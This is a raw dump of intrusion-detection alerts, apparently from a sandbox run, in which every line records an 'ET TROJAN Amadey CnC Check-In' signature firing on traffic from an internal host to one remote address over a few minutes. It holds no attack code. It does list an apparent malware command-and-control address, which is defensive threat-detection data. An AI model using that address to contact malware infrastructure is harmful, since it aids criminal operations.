                                                                      192.168.2.762.204.41.450095802027700 02/07/23-23:08:49.744924TCP2027700ET TROJAN Amadey CnC Check-In5009580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449963802027700 02/07/23-23:08:13.161472TCP2027700ET TROJAN Amadey CnC Check-In4996380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450115802027700 02/07/23-23:08:55.052783TCP2027700ET TROJAN Amadey CnC Check-In5011580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450185802027700 02/07/23-23:09:14.360322TCP2027700ET TROJAN Amadey CnC Check-In5018580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449762802027700 02/07/23-23:07:17.827370TCP2027700ET TROJAN Amadey CnC Check-In4976280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450381802027700 02/07/23-23:10:04.673244TCP2027700ET TROJAN Amadey CnC Check-In5038180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450316802027700 02/07/23-23:09:48.784877TCP2027700ET TROJAN Amadey CnC Check-In5031680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450020802027700 02/07/23-23:08:29.489590TCP2027700ET TROJAN Amadey CnC Check-In5002080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449938802027700 02/07/23-23:08:06.973604TCP2027700ET TROJAN Amadey CnC Check-In4993880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450058802027700 02/07/23-23:08:40.571514TCP2027700ET TROJAN Amadey CnC Check-In5005880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450067802027700 02/07/23-23:08:42.809418TCP2027700ET TROJAN Amadey CnC Check-In5006780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449880802027700 02/07/23-23:07:49.880282TCP2027700ET TROJAN Amadey CnC Check-In4988080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449864802027700 02/07/23-23:07:45.902188TCP2027700ET TROJAN Amadey CnC Check-In4986480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450214802027700 02/07/23-23:09:21.511864TCP2027700ET TROJAN Amadey CnC Check-In5021480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449947802027700 02/07/23-23:08:09.176994TCP2027700ET TROJAN Amadey CnC Check-In4994780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450140802027700 02/07/23-23:09:01.270109TCP2027700ET TROJAN Amadey CnC Check-In5014080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450296802027700 02/07/23-23:09:43.846361TCP2027700ET TROJAN Amadey CnC Check-In5029680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450131802027700 02/07/23-23:08:59.066086TCP2027700ET TROJAN Amadey CnC Check-In5013180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450401802027700 02/07/23-23:10:09.526189TCP2027700ET TROJAN Amadey CnC Check-In5040180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450086802027700 02/07/23-23:08:47.567671TCP2027700ET TROJAN Amadey CnC Check-In5008680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449919802027700 02/07/23-23:08:02.303851TCP2027700ET TROJAN Amadey CnC Check-In4991980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450299802027700 02/07/23-23:09:44.598785TCP2027700ET TROJAN Amadey CnC Check-In5029980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450169802027700 02/07/23-23:09:10.009649TCP2027700ET TROJAN Amadey CnC Check-In5016980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449991802027700 02/07/23-23:08:22.396521TCP2027700ET TROJAN Amadey CnC Check-In4999180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450039802027700 02/07/23-23:08:34.413705TCP2027700ET TROJAN Amadey CnC Check-In5003980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450112802027700 02/07/23-23:08:54.333220TCP2027700ET TROJAN Amadey CnC Check-In5011280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449966802027700 02/07/23-23:08:13.888624TCP2027700ET TROJAN Amadey CnC Check-In4996680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449753802027700 02/07/23-23:07:15.610893TCP2027700ET TROJAN Amadey CnC Check-In4975380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449706802027700 02/07/23-23:07:04.472246TCP2027700ET TROJAN Amadey CnC Check-In4970680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449836802027700 02/07/23-23:07:38.152613TCP2027700ET TROJAN Amadey CnC Check-In4983680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450325802027700 02/07/23-23:09:51.040294TCP2027700ET TROJAN Amadey CnC Check-In5032580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450242802027700 02/07/23-23:09:30.589447TCP2027700ET TROJAN Amadey CnC Check-In5024280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450455802027700 02/07/23-23:10:24.593085TCP2027700ET TROJAN Amadey CnC Check-In5045580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450372802027700 02/07/23-23:10:02.525802TCP2027700ET TROJAN Amadey CnC Check-In5037280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449900802027700 02/07/23-23:07:54.774755TCP2027700ET TROJAN Amadey CnC Check-In4990080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450323802027700 02/07/23-23:09:50.536075TCP2027700ET TROJAN Amadey CnC Check-In5032380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449961802027700 02/07/23-23:08:12.685375TCP2027700ET TROJAN Amadey CnC Check-In4996180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450032802027700 02/07/23-23:08:32.408441TCP2027700ET TROJAN Amadey CnC Check-In5003280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450384802027700 02/07/23-23:10:05.420068TCP2027700ET TROJAN Amadey CnC Check-In5038480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449722802027700 02/07/23-23:07:08.360519TCP2027700ET TROJAN Amadey CnC Check-In4972280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449878802027700 02/07/23-23:07:49.349230TCP2027700ET TROJAN Amadey CnC Check-In4987880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450127802027700 02/07/23-23:08:58.089434TCP2027700ET TROJAN Amadey CnC Check-In5012780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449750802027700 02/07/23-23:07:14.882617TCP2027700ET TROJAN Amadey CnC Check-In4975080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449704802027700 02/07/23-23:07:03.968547TCP2027700ET TROJAN Amadey CnC Check-In4970480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450050802027700 02/07/23-23:08:38.652718TCP2027700ET TROJAN Amadey CnC Check-In5005080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449737802027700 02/07/23-23:07:12.033255TCP2027700ET TROJAN Amadey CnC Check-In4973780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450004802027700 02/07/23-23:08:25.569822TCP2027700ET TROJAN Amadey CnC Check-In5000480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450341802027700 02/07/23-23:09:54.975800TCP2027700ET TROJAN Amadey CnC Check-In5034180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450356802027700 02/07/23-23:09:58.629045TCP2027700ET TROJAN Amadey CnC Check-In5035680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449994802027700 02/07/23-23:08:23.133003TCP2027700ET TROJAN Amadey CnC Check-In4999480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450145802027700 02/07/23-23:09:02.533585TCP2027700ET TROJAN Amadey CnC Check-In5014580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449793802027700 02/07/23-23:07:27.063291TCP2027700ET TROJAN Amadey CnC Check-In4979380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449933802027700 02/07/23-23:08:05.759793TCP2027700ET TROJAN Amadey CnC Check-In4993380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450418802027700 02/07/23-23:10:13.656697TCP2027700ET TROJAN Amadey CnC Check-In5041880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449755802027700 02/07/23-23:07:16.092892TCP2027700ET TROJAN Amadey CnC Check-In4975580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450469802027700 02/07/23-23:10:28.062597TCP2027700ET TROJAN Amadey CnC Check-In5046980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450155802027700 02/07/23-23:09:04.977918TCP2027700ET TROJAN Amadey CnC Check-In5015580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449951802027700 02/07/23-23:08:10.180584TCP2027700ET TROJAN Amadey CnC Check-In4995180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450060802027700 02/07/23-23:08:41.073047TCP2027700ET TROJAN Amadey CnC Check-In5006080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449827802027700 02/07/23-23:07:35.253285TCP2027700ET TROJAN Amadey CnC Check-In4982780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450351802027700 02/07/23-23:09:57.406628TCP2027700ET TROJAN Amadey CnC Check-In5035180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449732802027700 02/07/23-23:07:10.829866TCP2027700ET TROJAN Amadey CnC Check-In4973280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450328802027700 02/07/23-23:09:51.766213TCP2027700ET TROJAN Amadey CnC Check-In5032880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450178802027700 02/07/23-23:09:12.666182TCP2027700ET TROJAN Amadey CnC Check-In5017880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450374802027700 02/07/23-23:10:02.999700TCP2027700ET TROJAN Amadey CnC Check-In5037480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449810802027700 02/07/23-23:07:31.110999TCP2027700ET TROJAN Amadey CnC Check-In4981080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450173802027700 02/07/23-23:09:11.479350TCP2027700ET TROJAN Amadey CnC Check-In5017380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449905802027700 02/07/23-23:07:57.664790TCP2027700ET TROJAN Amadey CnC Check-In4990580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450268802027700 02/07/23-23:09:36.981445TCP2027700ET TROJAN Amadey CnC Check-In5026880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449727802027700 02/07/23-23:07:09.536306TCP2027700ET TROJAN Amadey CnC Check-In4972780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449709802027700 02/07/23-23:07:05.205403TCP2027700ET TROJAN Amadey CnC Check-In4970980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450251802027700 02/07/23-23:09:32.760947TCP2027700ET TROJAN Amadey CnC Check-In5025180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450446802027700 02/07/23-23:10:22.408033TCP2027700ET TROJAN Amadey CnC Check-In5044680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450318802027700 02/07/23-23:09:49.262876TCP2027700ET TROJAN Amadey CnC Check-In5031880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450346802027700 02/07/23-23:09:56.168424TCP2027700ET TROJAN Amadey CnC Check-In5034680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449956802027700 02/07/23-23:08:11.390677TCP2027700ET TROJAN Amadey CnC Check-In4995680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449800802027700 02/07/23-23:07:28.753249TCP2027700ET TROJAN Amadey CnC Check-In4980080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450122802027700 02/07/23-23:08:56.823302TCP2027700ET TROJAN Amadey CnC Check-In5012280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450278802027700 02/07/23-23:09:39.423463TCP2027700ET TROJAN Amadey CnC Check-In5027880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450022802027700 02/07/23-23:08:30.007207TCP2027700ET TROJAN Amadey CnC Check-In5002280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450313802027700 02/07/23-23:09:48.033865TCP2027700ET TROJAN Amadey CnC Check-In5031380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450200802027700 02/07/23-23:09:18.098931TCP2027700ET TROJAN Amadey CnC Check-In5020080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449760802027700 02/07/23-23:07:17.283372TCP2027700ET TROJAN Amadey CnC Check-In4976080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449765802027700 02/07/23-23:07:19.352231TCP2027700ET TROJAN Amadey CnC Check-In4976580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449902802027700 02/07/23-23:07:55.670942TCP2027700ET TROJAN Amadey CnC Check-In4990280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449984802027700 02/07/23-23:08:20.651522TCP2027700ET TROJAN Amadey CnC Check-In4998480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450176802027700 02/07/23-23:09:12.185200TCP2027700ET TROJAN Amadey CnC Check-In5017680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449701802027700 02/07/23-23:07:03.267557TCP2027700ET TROJAN Amadey CnC Check-In4970180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450415802027700 02/07/23-23:10:12.934992TCP2027700ET TROJAN Amadey CnC Check-In5041580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450476802027700 02/07/23-23:10:29.753559TCP2027700ET TROJAN Amadey CnC Check-In5047680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450320802027700 02/07/23-23:09:49.746312TCP2027700ET TROJAN Amadey CnC Check-In5032080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449786802027700 02/07/23-23:07:25.415635TCP2027700ET TROJAN Amadey CnC Check-In4978680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450448802027700 02/07/23-23:10:22.892315TCP2027700ET TROJAN Amadey CnC Check-In5044880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450053802027700 02/07/23-23:08:39.384369TCP2027700ET TROJAN Amadey CnC Check-In5005380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449829802027700 02/07/23-23:07:35.738938TCP2027700ET TROJAN Amadey CnC Check-In4982980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450219802027700 02/07/23-23:09:22.722186TCP2027700ET TROJAN Amadey CnC Check-In5021980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450071802027700 02/07/23-23:08:43.808188TCP2027700ET TROJAN Amadey CnC Check-In5007180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449930802027700 02/07/23-23:08:05.022671TCP2027700ET TROJAN Amadey CnC Check-In4993080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450148802027700 02/07/23-23:09:03.260796TCP2027700ET TROJAN Amadey CnC Check-In5014880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450025802027700 02/07/23-23:08:30.727717TCP2027700ET TROJAN Amadey CnC Check-In5002580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450221802027700 02/07/23-23:09:23.231201TCP2027700ET TROJAN Amadey CnC Check-In5022180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449885802027700 02/07/23-23:07:51.097832TCP2027700ET TROJAN Amadey CnC Check-In4988580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450043802027700 02/07/23-23:08:36.948526TCP2027700ET TROJAN Amadey CnC Check-In5004380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449857802027700 02/07/23-23:07:44.177016TCP2027700ET TROJAN Amadey CnC Check-In4985780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449987802027700 02/07/23-23:08:21.404063TCP2027700ET TROJAN Amadey CnC Check-In4998780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450453802027700 02/07/23-23:10:24.103441TCP2027700ET TROJAN Amadey CnC Check-In5045380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450101802027700 02/07/23-23:08:51.475051TCP2027700ET TROJAN Amadey CnC Check-In5010180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449831802027700 02/07/23-23:07:36.211398TCP2027700ET TROJAN Amadey CnC Check-In4983180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449834802027700 02/07/23-23:07:37.138339TCP2027700ET TROJAN Amadey CnC Check-In4983480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450450802027700 02/07/23-23:10:23.361477TCP2027700ET TROJAN Amadey CnC Check-In5045080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450015802027700 02/07/23-23:08:28.258645TCP2027700ET TROJAN Amadey CnC Check-In5001580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449923802027700 02/07/23-23:08:03.274770TCP2027700ET TROJAN Amadey CnC Check-In4992380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450272802027700 02/07/23-23:09:37.970566TCP2027700ET TROJAN Amadey CnC Check-In5027280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450349802027700 02/07/23-23:09:56.920228TCP2027700ET TROJAN Amadey CnC Check-In5034980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450183802027700 02/07/23-23:09:13.886211TCP2027700ET TROJAN Amadey CnC Check-In5018380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449803802027700 02/07/23-23:07:29.455829TCP2027700ET TROJAN Amadey CnC Check-In4980380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450275802027700 02/07/23-23:09:38.709285TCP2027700ET TROJAN Amadey CnC Check-In5027580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449758802027700 02/07/23-23:07:16.813665TCP2027700ET TROJAN Amadey CnC Check-In4975880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450377802027700 02/07/23-23:10:03.701999TCP2027700ET TROJAN Amadey CnC Check-In5037780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449977802027700 02/07/23-23:08:18.914835TCP2027700ET TROJAN Amadey CnC Check-In4997780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450028802027700 02/07/23-23:08:31.449239TCP2027700ET TROJAN Amadey CnC Check-In5002880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450117802027700 02/07/23-23:08:55.559827TCP2027700ET TROJAN Amadey CnC Check-In5011780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450247802027700 02/07/23-23:09:31.810490TCP2027700ET TROJAN Amadey CnC Check-In5024780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450425802027700 02/07/23-23:10:15.374875TCP2027700ET TROJAN Amadey CnC Check-In5042580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449806802027700 02/07/23-23:07:30.176072TCP2027700ET TROJAN Amadey CnC Check-In4980680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449888802027700 02/07/23-23:07:51.818185TCP2027700ET TROJAN Amadey CnC Check-In4988880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449694802027700 02/07/23-23:07:00.567051TCP2027700ET TROJAN Amadey CnC Check-In4969480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449949802027700 02/07/23-23:08:09.663718TCP2027700ET TROJAN Amadey CnC Check-In4994980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450081802027700 02/07/23-23:08:46.318733TCP2027700ET TROJAN Amadey CnC Check-In5008180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449783802027700 02/07/23-23:07:24.676198TCP2027700ET TROJAN Amadey CnC Check-In4978380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450199802027700 02/07/23-23:09:17.854664TCP2027700ET TROJAN Amadey CnC Check-In5019980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450314802027700 02/07/23-23:09:48.299454TCP2027700ET TROJAN Amadey CnC Check-In5031480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449924802027700 02/07/23-23:08:03.524088TCP2027700ET TROJAN Amadey CnC Check-In4992480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450416802027700 02/07/23-23:10:13.181627TCP2027700ET TROJAN Amadey CnC Check-In5041680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450281802027700 02/07/23-23:09:40.172674TCP2027700ET TROJAN Amadey CnC Check-In5028180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450192802027700 02/07/23-23:09:16.124888TCP2027700ET TROJAN Amadey CnC Check-In5019280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450021802027700 02/07/23-23:08:29.768912TCP2027700ET TROJAN Amadey CnC Check-In5002180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449901802027700 02/07/23-23:07:55.355595TCP2027700ET TROJAN Amadey CnC Check-In4990180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449723802027700 02/07/23-23:07:08.598238TCP2027700ET TROJAN Amadey CnC Check-In4972380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450212802027700 02/07/23-23:09:21.026369TCP2027700ET TROJAN Amadey CnC Check-In5021280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449983802027700 02/07/23-23:08:20.411480TCP2027700ET TROJAN Amadey CnC Check-In4998380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450123802027700 02/07/23-23:08:57.096759TCP2027700ET TROJAN Amadey CnC Check-In5012380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449812802027700 02/07/23-23:07:31.595526TCP2027700ET TROJAN Amadey CnC Check-In4981280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450383802027700 02/07/23-23:10:05.178762TCP2027700ET TROJAN Amadey CnC Check-In5038380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449894802027700 02/07/23-23:07:53.270341TCP2027700ET TROJAN Amadey CnC Check-In4989480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450301802027700 02/07/23-23:09:45.082072TCP2027700ET TROJAN Amadey CnC Check-In5030180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450472802027700 02/07/23-23:10:28.781018TCP2027700ET TROJAN Amadey CnC Check-In5047280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450419802027700 02/07/23-23:10:13.897365TCP2027700ET TROJAN Amadey CnC Check-In5041980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449914802027700 02/07/23-23:08:01.055769TCP2027700ET TROJAN Amadey CnC Check-In4991480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450294802027700 02/07/23-23:09:43.344390TCP2027700ET TROJAN Amadey CnC Check-In5029480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450034802027700 02/07/23-23:08:32.903823TCP2027700ET TROJAN Amadey CnC Check-In5003480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450329802027700 02/07/23-23:09:52.020233TCP2027700ET TROJAN Amadey CnC Check-In5032980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449906802027700 02/07/23-23:07:58.951742TCP2027700ET TROJAN Amadey CnC Check-In4990680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450295802027700 02/07/23-23:09:43.610527TCP2027700ET TROJAN Amadey CnC Check-In5029580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450099802027700 02/07/23-23:08:50.963558TCP2027700ET TROJAN Amadey CnC Check-In5009980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449872802027700 02/07/23-23:07:47.908431TCP2027700ET TROJAN Amadey CnC Check-In4987280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450038802027700 02/07/23-23:08:34.135275TCP2027700ET TROJAN Amadey CnC Check-In5003880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450234802027700 02/07/23-23:09:26.686624TCP2027700ET TROJAN Amadey CnC Check-In5023480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450430802027700 02/07/23-23:10:18.142734TCP2027700ET TROJAN Amadey CnC Check-In5043080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449811802027700 02/07/23-23:07:31.352080TCP2027700ET TROJAN Amadey CnC Check-In4981180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449967802027700 02/07/23-23:08:14.132869TCP2027700ET TROJAN Amadey CnC Check-In4996780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450172802027700 02/07/23-23:09:11.243219TCP2027700ET TROJAN Amadey CnC Check-In5017280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449844802027700 02/07/23-23:07:41.013550TCP2027700ET TROJAN Amadey CnC Check-In4984480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449939802027700 02/07/23-23:08:07.214342TCP2027700ET TROJAN Amadey CnC Check-In4993980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450066802027700 02/07/23-23:08:42.558660TCP2027700ET TROJAN Amadey CnC Check-In5006680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450267802027700 02/07/23-23:09:36.717040TCP2027700ET TROJAN Amadey CnC Check-In5026780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450463802027700 02/07/23-23:10:26.545692TCP2027700ET TROJAN Amadey CnC Check-In5046380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449816802027700 02/07/23-23:07:32.564007TCP2027700ET TROJAN Amadey CnC Check-In4981680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450144802027700 02/07/23-23:09:02.280526TCP2027700ET TROJAN Amadey CnC Check-In5014480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450239802027700 02/07/23-23:09:29.333776TCP2027700ET TROJAN Amadey CnC Check-In5023980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449934802027700 02/07/23-23:08:05.990363TCP2027700ET TROJAN Amadey CnC Check-In4993480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450262802027700 02/07/23-23:09:35.513958TCP2027700ET TROJAN Amadey CnC Check-In5026280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449738802027700 02/07/23-23:07:12.270875TCP2027700ET TROJAN Amadey CnC Check-In4973880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450357802027700 02/07/23-23:09:58.872294TCP2027700ET TROJAN Amadey CnC Check-In5035780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450340802027700 02/07/23-23:09:54.719055TCP2027700ET TROJAN Amadey CnC Check-In5034080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449721802027700 02/07/23-23:07:08.117512TCP2027700ET TROJAN Amadey CnC Check-In4972180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449990802027700 02/07/23-23:08:22.153608TCP2027700ET TROJAN Amadey CnC Check-In4999080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450352802027700 02/07/23-23:09:57.641139TCP2027700ET TROJAN Amadey CnC Check-In5035280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449733802027700 02/07/23-23:07:11.073843TCP2027700ET TROJAN Amadey CnC Check-In4973380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450000802027700 02/07/23-23:08:24.592012TCP2027700ET TROJAN Amadey CnC Check-In5000080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450407802027700 02/07/23-23:10:11.016581TCP2027700ET TROJAN Amadey CnC Check-In5040780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450082802027700 02/07/23-23:08:46.560439TCP2027700ET TROJAN Amadey CnC Check-In5008280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449782802027700 02/07/23-23:07:24.432492TCP2027700ET TROJAN Amadey CnC Check-In4978280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450435802027700 02/07/23-23:10:19.733664TCP2027700ET TROJAN Amadey CnC Check-In5043580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449754802027700 02/07/23-23:07:15.855344TCP2027700ET TROJAN Amadey CnC Check-In4975480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449705802027700 02/07/23-23:07:04.226733TCP2027700ET TROJAN Amadey CnC Check-In4970580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450324802027700 02/07/23-23:09:50.786571TCP2027700ET TROJAN Amadey CnC Check-In5032480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450290802027700 02/07/23-23:09:42.372267TCP2027700ET TROJAN Amadey CnC Check-In5029080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450373802027700 02/07/23-23:10:02.763122TCP2027700ET TROJAN Amadey CnC Check-In5037380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450116802027700 02/07/23-23:08:55.305221TCP2027700ET TROJAN Amadey CnC Check-In5011680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449962802027700 02/07/23-23:08:12.926371TCP2027700ET TROJAN Amadey CnC Check-In4996280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450033802027700 02/07/23-23:08:32.657521TCP2027700ET TROJAN Amadey CnC Check-In5003380192.168.2.762.204.41.4
